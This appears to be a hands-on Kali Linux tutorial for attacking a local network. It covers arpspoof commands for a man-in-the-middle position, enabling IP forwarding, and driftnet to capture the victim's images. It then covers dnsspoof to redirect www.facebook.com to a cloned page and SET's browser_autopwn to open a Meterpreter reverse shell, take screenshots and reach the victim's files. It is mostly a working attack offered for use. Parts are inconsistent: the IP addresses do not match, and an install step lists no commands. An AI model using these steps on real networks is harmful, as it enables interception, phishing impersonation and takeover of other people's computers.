Arp poisoning with Kali to reverse shell

ARP MITM attack first requires telling the gateway (192.168.111.222) that the attacker (192.168.2.4) is the victim and telling the victim that the attacker is the router. Use the following commands in two separate terminals in Kali:

arpspoof -i eth6 -t 192.168.111.222 192.168.2.4 

arpspoof -i eth6 -t 192.168.2.4 192.168.111.222

Note that these commands will not work unless IP forwarding is enabled on the attacker's machine. Check the current status of IP forwarding with the following command:

cat /proc/sys/net/ipv4/ip_forward

If the output is "0", IP forwarding is currently disabled. To enable it, use the following command:

echo 1 > /proc/sys/net/ipv4/ip_forward

Once a man-in-the-middle connection is established, use a tool called Driftnet (driftnet -i <interface>) to see images from the victim's web surfing.

DNS cache poisoning

DNS cache poisoning involves spoofing a website like Facebook and tricking a user into visiting the attacker's page, which can then be used to input code and obtain a reverse shell. To begin, create a text file with the following contents, and name it something like facebook:


www.facebook.com 192.168.248.204 

192.168.248.204 www.facebook.com

Save this text file and then run the following command:

dnsspoof -i eth6 -f facebook

This command will intercept any DNS queries for Facebook and direct them to the attacker's machine. The attacker can then clone the Facebook page and make it appear as realistic as possible.

Next, use a client-side attack against the victim's browser using the Social Engineer Toolkit (SET) by Dave Kennedy. To install SET, run the following commands:

SET is pre-installed in Kali Linux, so you can simply run setoolkit in a terminal to launch the tool. From there, select the following options:

Select "no" to NAT/Port Forwarding, and enter the IP address of the attacker's machine when prompted. When asked which website to clone, enter http://www.facebook.com. Then select "browser_autopwn" and set the payload to Meterpreter (4), with port 443.

If everything goes well, a Meterpreter session will be established with the victim's machine. To access the session, use the following command:

sessions -i 1

Then type screenshot to take a screenshot of the victim's desktop, and shell to open a shell on the victim's machine. You should now have access to the victim's file system.